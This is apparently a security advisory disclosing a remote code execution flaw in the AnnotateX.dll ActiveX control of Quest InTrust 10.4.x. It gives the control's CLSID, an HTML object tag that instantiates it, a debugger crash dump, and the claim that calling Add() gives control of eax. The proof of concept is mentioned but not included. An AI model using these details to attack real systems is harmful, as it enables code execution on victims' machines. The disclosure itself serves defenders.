Quest InTrust 10.4.x Annotation Objects ActiveX Control 
AnnotateX.dll Uninitialized Pointer Remote Code Execution 


description: "InTrust securely collects, stores, reports and 
alerts on event log data from Windows, Unix and Linux systems, 
helping you comply with external regulations, internal policies 
and security best practices."

download url of a test version:

file tested:


The mentioned product installs an ActiveX control
with the following settings:

CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so 
Internet Explorer will allow scripting of this control
from remote.


By invoking the Add() method is
possible to call inside a memory region of choice
set by the attacker through ex. heap spray or other

Example code:

<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />

eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????

You are in control of eax: fully exploitable.
As attachment, proof of concept code.